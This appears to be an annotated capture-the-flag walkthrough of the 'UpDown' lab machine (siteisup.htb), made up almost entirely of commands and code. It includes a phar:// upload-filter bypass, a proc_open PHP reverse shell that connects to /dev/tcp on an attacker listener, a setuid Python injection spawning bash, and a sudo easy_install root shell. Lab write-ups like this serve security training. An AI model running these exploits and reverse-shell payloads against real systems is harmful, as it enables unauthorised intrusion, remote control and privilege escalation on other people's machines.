Summary
Target - 10.129.227.227
Nmap
# Full TCP sweep (-p-) with default scripts and service/version detection.
# -Pn skips host discovery because ICMP is often filtered on the lab VPN.
# -o writes normal-format output only; -oA would also give -oG/-oX copies.
nmap -Pn -p- -sC -sV -o UpDown_AllPort 10.129.227.227
WEB
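# Map the target IP to the site's hostname (presumably the web server
# redirects to / only serves siteisup.htb — confirm from the initial response).
echo "10.129.227.227 siteisup.htb" | sudo tee -a /etc/hosts
# Directory brute force on the main site and on the /dev path it exposes.
# The explicit http:// scheme keeps both invocations consistent with each
# other and with the vhost scan below (current gobuster releases would
# otherwise prepend it silently).
gobuster dir -u http://siteisup.htb -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://siteisup.htb/dev -w /usr/share/wordlists/dirb/common.txt
# Virtual-host brute force; --append-domain sends "Host: <word>.siteisup.htb".
gobuster vhost -u http://siteisup.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
# Register the dev vhost the scan turned up.
echo "10.129.227.227 dev.siteisup.htb" | sudo tee -a /etc/hosts
# /dev exposes a .git directory: pull the whole repository into ./dev.
# An exposed .git is a finding in its own right — it leaks source, history
# and any secrets that were ever committed.
git-dumper http://siteisup.htb/dev/.git dev
# Apache per-directory config from the dumped tree (git-dumper wrote into
# ./dev, so read it from there); this is where access to the dev vhost is
# presumably gated.
cat dev/.htaccess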
phar:// Exploit
# Read the upload handler from the dumped repository: it holds the extension
# filter and the directory uploads land in (needed for the phar:// path below).
cat checker.php
# Build a zip containing a PHP probe, then rename the archive to .txt so the
# extension filter lets it through — the phar:// wrapper reads the archive by
# content, not by suffix. NOTE(review): phpinfo() exposes the server's config
# and environment to anyone who can reach the URL; delete the upload once
# dfunc-bypasser has consumed it.
printf '%s\n' '<?php phpinfo(); ?>' > info.php
zip info.zip info.php
mv info.zip info.txt
http://dev.siteisup.htb/?page=phar://uploads/a4cb7397e7c127125e4af8261d1c8fef/info.txt/info
dfunc-bypasser.py
# Patch applied inside dfunc-bypasser.py: the dev vhost only answers requests
# carrying this header (presumably enforced by the dumped .htaccess — verify
# there), so the phpinfo() fetch has to send it as well.
dev_headers = {"Special-dev": "only4dev"}
phpinfo = requests.get(url, headers=dev_headers).text
# Run the patched script against the phar:// URL of the uploaded archive. It
# parses the phpinfo() page for exec-style functions missing from
# disable_functions. The hashed directory under uploads/ appears to change per
# upload — substitute the one your own upload returned. The URL is quoted so
# the '?' and '/' are not subject to globbing.
python dfunc-bypasser.py --url 'http://dev.siteisup.htb/?page=phar://uploads/11d0d701df649f7c93b673db37e5c66b/info.txt/info'
proc_open Exploit
# poc.php
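<?php
// Reverse-shell PoC run through the phar:// include. proc_open() is used
// because it is one of the exec-style functions left out of disable_functions
// (per the dfunc-bypasser output). Replace 10.10.14.36:9999 with your own
// listener (e.g. `nc -lvnp 9999`) before packing the archive.
$descriptorspec = array(
    0 => array('pipe', 'r'), // stdin:  child reads
    1 => array('pipe', 'w'), // stdout: child writes
    2 => array('pipe', 'w')  // stderr: child writes. Must be 'w' — for pipe
                             // descriptors PHP treats any mode not starting
                             // with 'w' as the read end, so the original 'a'
                             // handed the child a read-only fd as stderr.
);
// Interactive bash with stdin/stdout/stderr bound to a TCP socket back to the listener.
$cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.36/9999 0>&1'";
$process = proc_open($cmd, $descriptorspec, $pipes, null, null);
?>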
# Pack the PoC exactly like info.php: zip it, then rename to .txt to pass the
# extension check. Start the listener before requesting
# phar://uploads/<hash>/poc.txt/poc through the page parameter.
zip poc.zip poc.php
mv poc.zip poc.txt
http://dev.siteisup.htb/?page=phar://uploads/3a6182d84b5c185244868a879af73f68/poc.txt/poc
Privilege Escalation [developer]
# Setuid binaries owned by developer — the hop from the web user to developer.
# Errors (unreadable dirs) are discarded on purpose.
find / -user developer -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# Inspect the Python script next to the setuid helper (presumably what the
# binary invokes — confirm by reading it), then run the helper; at its input
# prompt the one-liner below spawns a shell with developer's privileges.
cat siteisup_test.py
./siteisup
__import__('os').system('/bin/bash')
# Trade the SUID shell for a stable SSH session using developer's own key.
# Copy id_rsa to the attacking host first (that transfer is not shown here).
ls -al /home/developer/.ssh
# ssh refuses a private key that is group/world readable.
chmod 600 id_rsa
ssh -i id_rsa developer@siteisup.htb
Privilege Escalation [root]
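# List developer's sudo rights; easy_install is expected to appear (the next
# step relies on it).
sudo -l
# GTFOBins easy_install: setup.py is executed as root when the package
# directory is "installed". The $(tty) substitutions are expanded by the
# calling shell on purpose, so root's sh is wired to this terminal.
# $TF is quoted on every use (mktemp paths are safe today, but unquoted
# expansions are the classic shell footgun — ShellCheck SC2086).
TF=$(mktemp -d)
printf '%s\n' "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > "$TF/setup.py"
sudo easy_install "$TF"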